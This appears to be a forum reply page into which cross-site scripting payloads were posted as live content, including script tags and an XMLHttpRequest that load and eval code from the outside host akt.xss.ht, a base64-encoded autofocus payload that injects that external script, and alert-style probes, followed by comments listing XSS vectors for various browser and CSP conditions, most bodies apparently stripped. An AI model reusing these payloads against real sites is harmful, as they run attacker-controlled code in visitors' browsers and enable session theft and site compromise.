
  • A'””><script src=https://akt.xss.ht></script>”>‘”>’>”><script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(“load”, b);a.open(“GET”, “//akt.xss.ht”);a.send();</script><script>$.getScript(“//akt.xss.ht”)</script>”><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYWt0Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus>

  • <object/data=javascript:alert()>

    <svg onload=”a=domain,b=confirm,c=window,c.onerror=b;throw a”>aa

    • This reply was modified 4 years ago by A'"">">'">'>">">. Reason: A'"">">'">'>">">

    void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script>” />data:text/html,<script>void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script> ‘”>>data:text/html,<script>void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script>

    <!– If you control the name, will work on Firefox in any context, will fail in chromium in DOM –>

    <!– If you control the URL, Safari-only –>

    <!– If you control the URL –>

    <!– If you control the name, but unsafe-eval not enabled –>

    <!– Just a casual script –>

    <!– If you control the name of the window –>

    <!– If you control the URL –>

    <!– If number of iframes on the page is constant –>

    <!– for Firefox only –>
    <iframe/srcdoc=”<svg><script/href=//ÇŠ.₨ />”>

    <!– If number of iframes on the page is random –>

    <!– If unsafe-inline is disabled in CSP and external scripts allowed –>

    <!– If inline styles are allowed –>

    <!– If inline styles are allowed, Safari only –>

    <!– If inline styles are allowed and the URL can be controlled –>

    <!– If inline styles are blocked –>

    <!– Uses external script as import, doesn’t work in innerHTML unless Firefox –>
    <!– The PoC only works on https and Chrome, because ÇŠ.₨ checks for Sec-Fetch-Dest header –>

    <!– Uses external script as import, triggers if inline styles are allowed.
    <!– The PoC only works on https and Chrome, because ÇŠ.₨ checks for Sec-Fetch-Dest header –>

    <!– Uses external script as import –>
    <!– The PoC only works on https and Chrome, because ÇŠ.₨ checks for Sec-Fetch-Dest header –>

